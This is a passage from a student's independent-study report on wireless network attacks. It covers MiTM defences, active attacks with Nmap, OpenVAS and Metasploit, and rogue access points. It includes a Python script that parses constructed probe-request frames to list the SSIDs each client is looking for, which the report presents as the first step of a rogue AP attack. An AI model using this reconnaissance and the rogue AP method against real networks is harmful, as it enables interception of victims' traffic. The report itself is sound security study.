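    """Return the alerts produced for a reply sequence."""
    return ArpMonitor(trusted).run(replies)


if __name__ == "__main__":
    for line in detect():
        print(line)
```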
When a MiTM attack is in progress, precautions can still limit what is divulged. The attacker can
read anything sent in plaintext, so protocols without encryption should be avoided. Users should
also heed their browser's warning when a certificate cannot be verified; that warning is a large
indicator of a possible attack, and a site presenting an unverified certificate should not be used.
Lastly, when accessing secure websites, make sure SSL is actually in use by checking that the URL
is https:// and that the browser's own padlock indicator, not an icon inside the page, is shown.
Browser add-ons can force known sites to HTTPS, and a site that sends the Strict-Transport-Security
header makes the browser refuse plain HTTP for it on later visits, which defeats SSL stripping
for returning users.

THE NEXT STEPS


The previous attacks are only the beginning of what is possible against wireless networks. They
are somewhat passive attacks, as they mostly rely on monitoring network data to collect
information. These attacks can still be quite devastating to a small business or home network.
After an attacker has performed these steps, he can attempt more active attacks against the
victim. Active attacks become possible once the attacker can communicate directly with the
victim's machine. The first step in an active attack is to run a scan to discover hosts and
information about them. Nmap is particularly good at this.
Backtrack also includes a vulnerability scanner called OpenVAS. This is an open source fork of
the popular Nessus software. These vulnerability scanners provide much more details about the
hosts on the network and give the attacker possible angles of attack.
Metasploit. Backtrack includes the very powerful and easy to use Metasploit framework.
Metasploit is a collection of known exploits and payloads. Instead of having to write specific
code to exploit each machine, Metasploit allows an attacker to mix and match exploits and
payloads for his needs. A payload is the code that runs on the target once an exploit succeeds;
a command shell sent back to the attacker is the usual one. For most attacks, a command shell
with administrator privileges is the ultimate goal. From there, almost anything is possible. As the
hacking community popularly puts it, getting a root shell is "game over".
Metasploit works well with the scanning software also included in Backtrack. It can accept
results from Nmap and OpenVAS and then automatically tailor custom attacks based on the
information. With these tools, an attacker barely needs any programming or vulnerability
knowledge as Metasploit mostly automates the whole process.

Possible things to do when a machine is "popped" (a term for gaining a root shell) are browsing
and accessing its files, installing keyloggers, and setting up Trojans, backdoors and viruses on the
network. I plan on researching these direct attacks in much more detail this summer and learning
how to perform and defend against them.
Rogue APs. The wireless attack techniques above all rely on being able to gain access to an
existing wireless network. Another form of attack lures victims to connect to the attackers own
network, where he can then perform further attacks. This is referred to as setting up a Rogue
Access Point.
This can be as simple as creating a wireless network with an innocuous name like Free WiFi
and hoping a user connects to it. There are more active ways to accomplish this however.
Windows machines save preferred networks so they can automatically connect to them when they
are in range. To find them, the machine periodically sends out probe requests naming each of its
preferred networks. (The frames an access point sends to announce itself are beacons; the frames
the client sends while searching are probe requests, and those are what the attacker wants.) An
attacker can capture these probe requests and then create an access point with the same SSID.
Windows takes it for the preferred network it has saved and connects automatically, and from there
the attacker is free to do what he wants. This works best when the saved profile is for an open
network; a client whose saved profile uses WPA will not associate with an open impostor of the
same name.
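Harvesting the preferred-network list from probe requests is the first step of the rogue AP attack described above. The following added example (written for this report, not from any tool) parses raw 802.11 probe request frames: a 24-byte management header (frame control, duration, three addresses, sequence control) followed by tagged parameters, of which tag 0 carries the SSID. It groups the SSIDs by the probing client's MAC address, which is the list an attacker would pick an impostor name from and a defender would use to see which of his clients are leaking network names. The frames are constructed here by build_probe_request() with hypothetical MAC addresses; capturing real ones needs a monitor-mode interface and is not shown.

```python
"""Parse 802.11 probe requests into a per-client list of wanted SSIDs.
Added example; SAMPLE_FRAMES are constructed, MAC addresses hypothetical."""
import struct
from collections import defaultdict

# frame control byte 0: protocol 0, type 0 (management), subtype 4 (probe req)
FC_PROBE_REQ = 0x40
TAG_SSID = 0
TAG_RATES = 1


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def build_probe_request(src: str, ssid: str, seq: int = 0) -> bytes:
    """Constructed frame for the demo: management header + SSID and rates tags."""
    hdr = struct.pack("<BBH", FC_PROBE_REQ, 0x00, 0)   # FC, flags, duration
    hdr += b"\xff" * 6                                 # addr1: broadcast
    hdr += mac_bytes(src)                              # addr2: the probing client
    hdr += b"\xff" * 6                                 # addr3: BSSID, wildcard
    hdr += struct.pack("<H", seq << 4)                 # sequence control
    body = bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    body += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return hdr + body


def parse_probe_request(frame: bytes):
    """Return (client_mac, ssid) for a probe request, else None.
    An empty SSID is a wildcard probe, not a preferred-network name."""
    if len(frame) < 24 or frame[0] != FC_PROBE_REQ:
        return None
    client = mac_str(frame[10:16])          # addr2 = transmitter
    pos, ssid = 24, ""
    while pos + 2 <= len(frame):            # walk the tagged parameters
        tag, ln = frame[pos], frame[pos + 1]
        val = frame[pos + 2:pos + 2 + ln]
        if len(val) < ln:
            break                           # truncated tag, stop parsing
        if tag == TAG_SSID:
            ssid = val.decode("utf-8", "replace")
            break
        pos += 2 + ln
    return client, ssid


def preferred_networks(frames):
    """Map each probing client to the sorted list of SSIDs it asked for."""
    wanted = defaultdict(set)
    for f in frames:
        parsed = parse_probe_request(f)
        if parsed and parsed[1]:
            wanted[parsed[0]].add(parsed[1])
    return {client: sorted(ssids) for client, ssids in wanted.items()}


SAMPLE_FRAMES = [
    build_probe_request("00:11:22:33:44:55", "HomeNetwork", 1),
    build_probe_request("00:11:22:33:44:55", "", 2),          # wildcard probe
    build_probe_request("00:11:22:33:44:55", "CoffeeShopWiFi", 3),
    build_probe_request("66:77:88:99:aa:bb", "HomeNetwork", 1),
    b"\x80\x00" + b"\x00" * 30,                                 # a beacon, ignored
]


if __name__ == "__main__":
    for client, ssids in preferred_networks(SAMPLE_FRAMES).items():
        print(client, ssids)
```

Two clients asking for the same SSID is the situation a rogue AP exploits: one access point named HomeNetwork would be joined by both.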
I also plan to familiarize myself with setting up Rogue APs. Used in combination with
Metasploit, they can lead to extremely devastating attacks.

CONCLUSION
This independent study project was a challenging, yet very rewarding experience. I started with a
rough idea of what I wanted to research, having heard terms and ideas but not understanding
them. I really enjoyed researching and practicing what I wanted as I had no solid direction I
needed to go in.
I used the Hacking Exposed Wireless book as a rough guide, but did a lot more research on my
own through various forums and websites. I followed a variety of tutorials, and through the
practice my knowledge of the theory and application of these security principles increased
greatly.
I started with only a basic knowledge of Linux and almost no command line experience. I also
lacked a solid understanding of exactly how networking protocols worked. By the end of the
semester, I was not only much more proficient in Linux and command line tools, I understood
the intricacies of networking much better. Things I had learned in the past in previous classes
made a lot more sense to me now as I understood why things were working and not just how to
do them.
Everything I learned this semester was self-taught from books and online resources. I spent
countless hours trying things until I got them to work, and this trial and error process taught me
more than I could ever learn just from reading something. The tutorials I followed were only the
foundation for my knowledge. Once I learned how to use a specific tool, I thought of various
ways to use it and combine it with others. The exercises I created for myself were fun and
practical.
I have yet to cover everything I want to. As I learn new things I discover more I want to learn. I
plan on continuing to use my current setup to learn more about all aspects of penetration testing
and network security. Specifically, I plan on becoming proficient in other forms of active attacks
and using exploits. It will be a fun summer.

SOURCES
Cache, Johnny; Wright, Joshua; Liu, Vincent. Hacking Exposed Wireless: Wireless Security
Secrets and Solutions. 2010.
http://www.backtrack-linux.org/
http://www.backtrack-linux.org/tutorials/
http://www.backtrack-linux.org/forums/
http://www.irongeek.com/i.php?page=security/security
http://www.irongeek.com/i.php?page=security/hackingillustrated
http://www.cacetech.com/documents/ARP%20Overview%201.1.pdf
http://nmap.org/book/man.html
http://forum.intern0t.net/offensive-guides-information/
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf
http://www.oxid.it/downloads/apr-intro.swf
http://www3.rad.com/networks/applications/secure/tls.htm
http://computing.ece.vt.edu/~jkh/Understanding_SSL_TLS.pdf
http://www.thoughtcrime.org/software/sslstrip/
https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-MarlinspikeDefeating-SSL.pdf
A lot of information came from trial and error and reading the --help pages for applications.
Many forum posts were read that contained bits of pieces of information. The main forums
visited are listed above.